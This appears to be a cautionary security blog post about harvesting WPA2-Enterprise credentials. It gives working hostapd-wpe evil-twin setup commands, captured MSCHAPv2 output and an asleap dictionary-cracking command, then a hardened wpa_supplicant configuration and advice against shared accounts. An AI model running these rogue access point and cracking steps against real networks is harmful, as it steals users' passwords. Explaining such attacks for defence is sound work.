WPA-Enterprise laziness

The following story is fiction.

We have an IT security company with 1000 employees. Our office has no large wired infrastructure; instead we run high-density wifi, secured with WPA2-Enterprise. For wifi, internet, intranet, mail and office applications we use one single account...

Be aware of the man with the pineapple!

A simple example of recovering a username and password from a wifi network with SSID "WifiToHack":

  • apt-get install hostapd-wpe
  • edit /etc/hostapd-wpe/hostapd-wpe.conf
    • interface=wlan0
    • ssid=WifiToHack
  • hostapd-wpe -i wlan0 /etc/hostapd-wpe/hostapd-wpe.conf

After a while you will see something like:

mschapv2: Sat Jan 26 13:30:45 2019
username: hacker
challenge: 2c:b4:a8:d6:2a:b5:9a:76
response: 9a:7a:69:83:30:48:c6:c9:7a:3d:59:0a:1a:1e:b2:72:ec:02:50:8d:b1:45:d1:97

The example below shows how to crack the password with a dictionary. The option -C takes the challenge and -R takes the response; -W - reads the wordlist from standard input.

zcat dictionary.txt.gz | asleap -C 2c:b4:a8:d6:2a:b5:9a:76 -R 9a:7a:69:83:30:48:c6:c9:7a:3d:59:0a:1a:1e:b2:72:ec:02:50:8d:b1:45:d1:97 -W -

asleap 2.2 - actively recover LEAP/PPTP passwords.
Using STDIN for words.
hash bytes: 08bf
NT hash: 67f2dd97cb7a7744fd21675b3e8108bf
password: H@ckM3!

Notice that Apple devices won't connect automatically to these honeypots, but some Android devices will.
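Whether a device hands its credentials to the honeypot comes down to whether the supplicant validates the RADIUS server certificate before starting the inner MSCHAPv2 exchange. As an added illustration (not part of the original post), the two wpa_supplicant network blocks below show a weak PEAP/MSCHAPv2 profile next to a hardened one; the CA bundle path and the RADIUS server name are assumed placeholders, and the credentials are the fictional ones from the story.

```conf
# Added illustration, not from the original post. Assumed placeholders:
# the CA bundle path and the RADIUS server name.

# Weak profile: no server certificate check. Any AP broadcasting
# "WifiToHack" with its own RADIUS (as hostapd-wpe does) completes the
# TLS tunnel and receives the MSCHAPv2 challenge/response.
network={
    ssid="WifiToHack"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="hacker"
    password="H@ckM3!"
    phase2="auth=MSCHAPV2"
}

# Hardened profile: the inner authentication only runs after the server
# presents a certificate chained to the pinned CA and carrying the
# expected name, so a honeypot's self-signed certificate aborts the
# handshake before the credential is ever used. The anonymous outer
# identity also keeps the real username out of the cleartext part.
network={
    ssid="WifiToHack"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous"
    identity="hacker"
    password="H@ckM3!"
    phase2="auth=MSCHAPV2"
    # assumed path to the corporate CA that signed the RADIUS certificate
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    # assumed RADIUS server name; must match the certificate's name
    domain_suffix_match="radius.example.com"
}
```

The same two settings (trusted CA plus expected server name) are what a managed profile on Windows, Android or iOS pushes; a profile that leaves them blank is the one that auto-connects to the pineapple.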

Advice: don't use one single account for your wifi and Windows.

Note: any actions you take upon the information in this article are strictly at your own risk!